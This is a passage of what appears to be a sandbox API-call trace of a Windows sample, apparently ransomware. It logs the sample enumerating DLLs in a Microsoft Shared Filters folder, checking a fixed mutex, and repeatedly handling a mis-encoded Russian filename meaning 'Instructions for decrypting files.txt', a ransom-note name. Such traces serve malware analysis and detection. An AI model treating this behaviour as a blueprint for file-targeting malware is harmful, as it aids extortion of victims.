lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.322] CharLowerBuffW (in: lpsz="msgfilt.dll", cchLength=0xb | out: lpsz="msgfilt.dll") returned 0xb [0109.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.323] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", cchWideChar=66, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dllà", lpUsedDefaultChar=0x0) returned 66 [0109.323] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\msgfilt.dllà", lpUsedDefaultChar=0x0) returned 4 [0109.323] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: 
lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0109.323] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.323] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.323] GlobalLock (hMem=0x450004) returned 0x591988 [0109.323] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.323] GlobalUnlock (hMem=0x450004) returned 0 [0109.323] GlobalLock (hMem=0x450004) returned 0x591988 [0109.324] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.324] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.324] GlobalUnlock (hMem=0x450004) returned 0 [0109.324] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.324] GlobalUnlock (hMem=0x45000c) returned 0 [0109.324] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.324] CharLowerBuffW (in: lpsz="odffilt.dll", cchLength=0xb | out: lpsz="odffilt.dll") returned 0xb [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", cchWideChar=66, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dllà", lpUsedDefaultChar=0x0) returned 66 [0109.325] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\odffilt.dllà", lpUsedDefaultChar=0x0) returned 4 [0109.325] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0109.325] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.325] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 
[0109.325] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.325] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.325] GlobalUnlock (hMem=0x45000c) returned 0 [0109.325] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.325] GlobalLock (hMem=0x450004) returned 0x593998 [0109.325] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.325] GlobalUnlock (hMem=0x45000c) returned 0 [0109.325] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.325] GlobalUnlock (hMem=0x450004) returned 0 [0109.325] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.326] CharLowerBuffW (in: lpsz="offfiltx.dll", cchLength=0xc | out: lpsz="offfiltx.dll") returned 0xc [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.326] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpUsedDefaultChar=0x0) returned 67 [0109.326] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\offfiltx.dll", lpUsedDefaultChar=0x0) returned 4 [0109.326] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0109.326] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.326] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.326] GlobalLock (hMem=0x450004) returned 0x591988 [0109.326] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.327] GlobalUnlock (hMem=0x450004) returned 0 [0109.327] GlobalLock (hMem=0x450004) returned 0x591988 [0109.327] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.327] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.327] GlobalUnlock (hMem=0x450004) returned 0 [0109.327] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.327] GlobalUnlock 
(hMem=0x45000c) returned 0 [0109.327] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.327] CharLowerBuffW (in: lpsz="VISFILT.DLL", cchLength=0xb | out: lpsz="visfilt.dll") returned 0xb [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) 
returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ví\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", cchWideChar=66, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLLà", lpUsedDefaultChar=0x0) returned 66 [0109.328] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\VISFILT.DLLà", lpUsedDefaultChar=0x0) returned 4 [0109.328] 
FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0109.328] GetLastError () returned 0x12 [0109.328] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.328] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.328] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.328] GlobalUnlock (hMem=0x45000c) returned 0 [0109.328] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.328] GlobalLock (hMem=0x450004) returned 0x593998 [0109.328] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.328] GlobalUnlock (hMem=0x45000c) returned 0 [0109.328] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.328] GlobalUnlock (hMem=0x450004) returned 0 [0109.328] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.329] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.329] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.329] 
GlobalLock (hMem=0x450004) returned 0x591988 [0109.329] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.329] GlobalUnlock (hMem=0x450004) returned 0 [0109.329] GlobalLock (hMem=0x450004) returned 0x591988 [0109.329] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.329] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.329] GlobalUnlock (hMem=0x450004) returned 0 [0109.329] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.329] GlobalUnlock (hMem=0x45000c) returned 0 [0109.329] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.329] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.329] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.329] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.329] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.329] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.329] GlobalUnlock (hMem=0x45000c) returned 0 [0109.329] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.329] GlobalLock (hMem=0x450004) returned 0x593998 [0109.329] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.330] GlobalUnlock (hMem=0x45000c) returned 0 [0109.330] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.330] GlobalUnlock (hMem=0x450004) returned 0 [0109.330] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
